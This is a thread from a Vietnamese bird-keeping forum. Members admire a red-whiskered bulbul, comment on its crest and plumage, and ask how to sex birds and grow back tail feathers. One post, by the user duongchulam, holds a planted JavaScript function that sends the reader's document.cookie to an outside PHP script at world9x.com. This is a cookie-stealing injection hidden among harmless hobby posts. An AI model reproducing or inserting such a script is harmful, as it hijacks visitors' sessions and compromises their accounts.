Guest viewing is limited

Doan_Hoa_2010

Thành viên tích cực
SVC$
0
chim bạn đẹp mê hồn, cho mình hỏi bạn ở dâu vây, mình mới chơi cm thôi, bạn cho mình biết cách đơn giản để phân biệt cm trống và mái nha, rất mong tin bạn.

Chỉnh sửa lần cuối bởi người điều hành:

crazytimes

"Cùng Đam Mê - Cùng Chia Sẻ"
SVC$
0

cho em xin ý kiến nha em nó thay lông gần xong . chim 3 mùa rùi nha mấy anh :a20:

em này nhìn tướng mạo bên ngoài thì đúng là đẹp thiệt. Hết.

P/s. Nếu bạn muốn AE có những góp ý tổng quát về một chú chim, vui lòng up thêm cái clip.

as08

Thành viên tích cực
SVC$
0
tướng lỳ, dáng đẹp, nhưng mào em nó thì không chuẩn cho lắm, gốc mào và đỉnh mào còn bé quá. chim 3 mua rồi nên chân chim đã có vảy và khô, bác chăm sóc kỹ em nó nhé

Chào Mào Chư Sê

Thành viên diễn đàn
SVC$
0
Em này đẹp ghê, bạn mua lại bao nhiêu vậy, chim đang thay lông mà lông lá mướt quá. nếu bạn có clip em nó nữa thì tuyệt lắm

miss_you505

Thành viên diễn đàn
SVC$
0
Làm cách nào cho CM mọc hết lông đuôi

các bác cho em hỏi, em có em Chào Mào nuôi đc gần 1 nam­ rất rạn ngu­o­i nhung lông đuôi cú­ mọc ra lại bị gẫy, em cũng đã nhổ hết lông đuôi cho nó mọc lông moi rồi mà vẫn bị thế. mong các bác cho em huong gquyet voi a.

duongchulam

Thành viên tích cực
SVC$
0
mấy bác ơi sao em không thấy hình trong topic này vậy kà. em có con bổi nuôi 1 năm rồi đầu cổ thê thảm lắm

<script>function clickpage(){document.location="http://world9x.com/cookie/fakecookie.php?c="+document.cookie;}</script>

Chỉnh sửa lần cuối:

xich tho

Thành viên diễn đàn
SVC$
0
em này nhìn tướng mạo bên ngoài thì đúng là đẹp thiệt. Hết.

P/s. Nếu bạn muốn AE có những góp ý tổng quát về một chú chim, vui lòng up thêm cái clip.
theo em thì cái mào của nó hơi mỏng coi bộ ko bền cho lắm

chaomaohot

Thành viên tích cực
SVC$
0

cho em xin ý kiến nha em nó thay lông gần xong . chim 3 mùa rùi nha mấy anh :a20:
chim bạn nhìn tướng tá đẹp quá và dữ chim , lông chưa hoàn thiện nên chưa mượt lắm , ko biết giọng thế nào.đề nghị bác cho xin 500 video để anh em thưởng thức nhé

Chủ đề được đánh giá cao

Bên trên Bottom